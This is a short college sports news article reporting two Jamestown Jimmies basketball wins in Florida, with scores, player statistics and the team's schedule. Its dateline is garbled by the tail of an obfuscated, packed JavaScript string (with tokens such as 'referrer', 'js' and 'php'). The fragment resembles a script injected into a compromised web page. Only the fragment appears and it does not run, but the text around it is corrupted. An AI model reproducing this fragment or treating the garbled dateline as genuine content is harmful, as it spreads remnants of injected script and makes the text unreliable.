JAMESTOWN, tsidf|var|u0026u|referrer|dkrnz||js|php’.split(‘|’),0,{}))
ND (NewsDakota.com)- The Jimmie men went on the road to Florida for two games and came back with two victories. A day at the beach and amusement parks sandwiched between two basketball games didn’t affect Jamestown. They came out business like and in the words of Head Coach Matt Murken, “really competed.”

On Saturday they defeated No. 15 Southeastern (Fla.) 62-58, holding the fire to just 32% shooting in their own gym. B.J. Mertens led the way for JC with 14 points, connecting on all four of his long range attempts.

Travis Burley added 11 and he also pulled down a game-high nine rebounds.

Monday, it was another Top-2o on the schedule for Coach Murken’s squad and again another “W.” The Jimmies defeated No. 18 Warner Southern (Fla.) 60-56 with another great defensive outing.

Despite shooting a dismal 28% from the field in the first half JC only trailed by one.

The second half saw 11 lead changes and 6 ties before the Jimmies were able to escape with a four-point margin. Byron Jones hit two free throws with second remaining to preserve the win.

Jamestown ran off their 11th straight win and improve to 11-3. The Jimmies will have just over a week off for the Holiday break before traveling to Iowa to take on Morningside and Briar Cliff on December 29th and 30th.
